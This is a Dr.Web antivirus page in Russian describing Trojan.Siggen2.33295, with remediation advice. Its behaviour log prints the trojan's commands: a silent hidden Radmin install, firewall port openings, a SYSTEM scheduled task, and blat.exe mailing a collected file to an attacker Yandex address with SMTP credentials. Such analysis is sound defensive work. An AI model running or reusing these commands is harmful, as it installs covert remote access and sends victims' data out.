Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen2.33295

Добавлен в вирусную базу Dr.Web: 2014-06-21

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'cam_server.exe' = '<SYSTEM32>\sysfiles\server\cam_server.exe pass=svWT{JYYR port=57011'
Создает или изменяет следующие файлы:
  • %WINDIR%\Tasks\security.job
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\sysfiles\server\cam_server.exe' = '<SYSTEM32>\sysfiles\server\cam_server.exe:*:Enabled:cam_server'
Создает и запускает на исполнение:
  • '<SYSTEM32>\sysfiles\winver.exe'
  • '<SYSTEM32>\sysfiles\server\cam_server.exe' pass=svWT{JYYR port=57011
  • '<SYSTEM32>\sysfiles\blat.exe' "<SYSTEM32>\sysfiles\1.txt" -to JkSCC7rrFu@yandex.ru
  • '%TEMP%\1.tmp\radmin_install.exe'
  • '<SYSTEM32>\sysfiles\blat.exe' -install -server smtp.yandex.ru -port 587 -f JkSCC7rrFu@yandex.ru -u JkSCC7rrFu -pw EUI2MKsORm
Запускает на исполнение:
  • '<SYSTEM32>\reg.exe' add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "<SYSTEM32>\sysfiles\server\cam_server.exe pass=svWT{JYYR port=57011" /f
  • '<SYSTEM32>\ipconfig.exe' /all
  • '<SYSTEM32>\reg.exe' import log_pass.reg
  • '<SYSTEM32>\msiexec.exe' /V
  • '<SYSTEM32>\reg.exe' query "HKLM\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\1"
  • '<SYSTEM32>\msiexec.exe' -Embedding 57B103A7C451A73C1881D463D9C160EA
  • '<SYSTEM32>\find.exe' "ProductName"
  • '<SYSTEM32>\schtasks.exe' /create /tn "security" /sc minute /mo 1 /ru "NT AUTHORITY\SYSTEM" /tr "<SYSTEM32>\sysfiles\send_IP.exe"
  • '<SYSTEM32>\reg.exe' query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
  • '<SYSTEM32>\findstr.exe' "IP" <SYSTEM32>\sysfiles\ip1.txt
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7.tmp\winver.bat" "
  • '<SYSTEM32>\reg.exe' add HKCU\Console\%SystemRoot%_system32_cmd.exe /v FontFamily /t REG_DWORD /d 0x0000036 /f
  • '<SYSTEM32>\reg.exe' add HKCU\Console\%SystemRoot%_system32_cmd.exe /v FontSize /t REG_DWORD /d 0x000c0000 /f
  • '<SYSTEM32>\reg.exe' add HKCU\Console\%SystemRoot%_system32_cmd.exe /v FaceName /t REG_SZ /d "Lucida Console" /f
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\install.bat" "
  • '<SYSTEM32>\reg.exe' add HKCU\Console\%SystemRoot%_system32_cmd.exe /v CodePage /t REG_DWORD /d 1251 /f
  • '<SYSTEM32>\reg.exe' add HKCU\Console\%SystemRoot%_system32_cmd.exe /v FontWeight /t REG_DWORD /d 0x00002bc /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server" /v HideTrayIcon /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\netsh.exe' firewall add portopening tcp 57011 all
  • '<SYSTEM32>\msiexec.exe' /i "radmin.msi" /quiet /norestart
  • '<SYSTEM32>\netsh.exe' firewall add allowedprogram "<SYSTEM32>\sysfiles\server\cam_server.exe" "cam_server" ENABLE
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\2.tmp\radmin_install.bat" "
Изменения в файловой системе:
Создает следующие файлы:
  • <SYSTEM32>\sysfiles\ip1.txt
  • %WINDIR%\Installer\MSI3.tmp
  • %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup.exe
  • <SYSTEM32>\sysfiles\1.txt
  • %TEMP%\2.tmp\radmin.msi
  • %TEMP%\2.tmp\user.txt
  • %WINDIR%\Installer\2f0ee.msi
  • %TEMP%\2.tmp\log_pass.reg
  • %WINDIR%\Installer\MSI6.tmp
  • %WINDIR%\Installer\MSI5.tmp
  • %TEMP%\7.tmp\winver.bat
  • %TEMP%\MSI328f5.LOG
  • %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\FirewallInstallHelper.dll
  • %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe
  • %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\PrevVerCfg.bin
  • %WINDIR%\Installer\MSI4.tmp
  • %TEMP%\2.tmp\radmin_install.bat
  • %TEMP%\1.tmp\blat.exe
  • %TEMP%\1.tmp\radmin_install.exe
  • %TEMP%\1.tmp\cam_server.exe
  • %TEMP%\1.tmp\blat.lib
  • %TEMP%\1.tmp\send_IP.exe
  • %TEMP%\1.tmp\install.bat
  • %TEMP%\1.tmp\winver.exe
  • %TEMP%\1.tmp\send_IPv4.exe
  • <SYSTEM32>\sysfiles\send_IPv4.exe
  • <SYSTEM32>\sysfiles\send_IP.exe
  • <SYSTEM32>\sysfiles\server\cam_server.exe
  • <SYSTEM32>\sysfiles\winver.exe
  • <SYSTEM32>\sysfiles\blat.exe
  • %TEMP%\1.tmp\blat.dll
  • <SYSTEM32>\sysfiles\blat.dll
  • <SYSTEM32>\sysfiles\blat.lib
Удаляет следующие файлы:
  • %TEMP%\1.tmp\blat.exe
  • %TEMP%\1.tmp\blat.lib
  • %TEMP%\1.tmp\radmin_install.exe
  • %TEMP%\1.tmp\send_IPv4.exe
  • %TEMP%\1.tmp\winver.exe
  • <SYSTEM32>\sysfiles\send_IPv4.exe
  • %TEMP%\7.tmp\winver.bat
  • %TEMP%\1.tmp\install.bat
  • %TEMP%\1.tmp\cam_server.exe
  • %TEMP%\1.tmp\blat.dll
  • %TEMP%\2.tmp\radmin_install.bat
  • %WINDIR%\Installer\MSI3.tmp
  • %TEMP%\2.tmp\radmin.msi
  • %TEMP%\2.tmp\log_pass.reg
  • %TEMP%\2.tmp\user.txt
  • %WINDIR%\Installer\2f0ee.msi
  • %TEMP%\1.tmp\send_IP.exe
  • %WINDIR%\Installer\MSI6.tmp
  • %WINDIR%\Installer\MSI4.tmp
  • %WINDIR%\Installer\MSI5.tmp
Сетевая активность:
Подключается к:
  • '93.##8.134.11':587
UDP:
  • DNS ASK sm##.yandex.ru

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке